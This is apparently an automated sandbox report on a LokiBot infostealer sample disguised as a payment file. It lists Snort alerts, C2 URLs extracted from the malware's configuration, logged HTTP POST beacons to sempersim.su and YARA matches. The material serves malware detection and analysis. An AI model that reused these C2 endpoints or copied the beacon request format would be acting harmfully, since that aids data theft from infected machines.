Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.6:49743
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:62848 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49744 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49744 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49744 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49744 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49744 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.6:49744
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:55956 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49745 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49745 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49745 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49745 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49745 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.6:49745
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:57515 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49746 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49746 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49746 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49746 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49746 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.6:49746
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:51321 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49747 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49747 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49747 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49747 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49747 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.6:49747
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:61089 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49748 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49748 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49748 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49748 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49748 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.6:49748
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:62766 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49749 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49749 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49749 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49749 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49749 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.6:49749
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:60130 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49750 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49750 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49750 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49750 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49750 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.6:49750
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:62732 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49751 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49751 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49751 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49751 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49751 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.6:49751
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:60690 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49752 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49752 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49752 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49752 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49752 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.6:49752
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:56750 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49753 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49753 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49753 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49753 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49753 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.6:49753
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:59336 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49754 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49754 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49754 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49754 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49754 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.6:49754
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:52715 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49755 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49755 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49755 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49755 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49755 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.6:49755

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.top/alien/fre.php

Source: Joe Sandbox View

ASN Name: SELECTELRU SELECTELRU

Source: global traffic	HTTP traffic detected: POST /gl20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1131A910Content-Length: 196Connection: close
Source: global traffic	HTTP traffic detected: POST /gl20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1131A910Content-Length: 196Connection: close
Source: global traffic	HTTP traffic detected: POST /gl20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1131A910Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1131A910Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1131A910Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1131A910Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1131A910Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1131A910Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1131A910Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1131A910Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1131A910Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1131A910Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1131A910Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1131A910Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1131A910Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1131A910Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1131A910Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1131A910Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1131A910Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1131A910Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1131A910Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1131A910Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1131A910Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1131A910Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1131A910Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1131A910Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1131A910Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1131A910Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1131A910Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1131A910Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1131A910Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1131A910Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1131A910Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1131A910Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1131A910Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1131A910Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1131A910Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1131A910Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1131A910Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1131A910Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1131A910Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1131A910Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1131A910Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1131A910Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1131A910Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1131A910Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1131A910Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1131A910Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1131A910Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1131A910Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1131A910Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1131A910Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1131A910Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1131A910Content-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /gl20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1131A910Content-Length: 169Connection: close

Source: Payment_copy28476450.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: Payment_copy28476450.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: wcycejenv.exe, 00000003.00000002.510211160.00000000004A0000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://sempersim.su/gl20/fre.php
Source: wcycejenv.exe, wcycejenv.exe, 00000003.00000000.253960864.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wcycejenv.exe, 00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ibsensoftware.com/

Source: unknown

HTTP traffic detected: POST /gl20/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: sempersim.suAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1131A910Content-Length: 196Connection: close

Source: unknown

DNS traffic detected: queries for: sempersim.su

Source: C:\Users\user\AppData\Local\Temp\wcycejenv.exe

Code function: 3_2_00404ED4 recv,

3_2_00404ED4

Source: C:\Users\user\Desktop\Payment_copy28476450.exe

Code function: 0_2_00405125 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00405125

System Summary

Malicious sample detected (through community Yara rule)

Source: 3.2.wcycejenv.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 3.2.wcycejenv.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 3.2.wcycejenv.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 3.2.wcycejenv.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 3.2.wcycejenv.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.wcycejenv.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 3.2.wcycejenv.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 3.2.wcycejenv.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 3.2.wcycejenv.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 3.2.wcycejenv.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.wcycejenv.exe.610000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 1.2.wcycejenv.exe.610000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 1.2.wcycejenv.exe.610000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 1.2.wcycejenv.exe.610000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 1.2.wcycejenv.exe.610000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.wcycejenv.exe.610000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
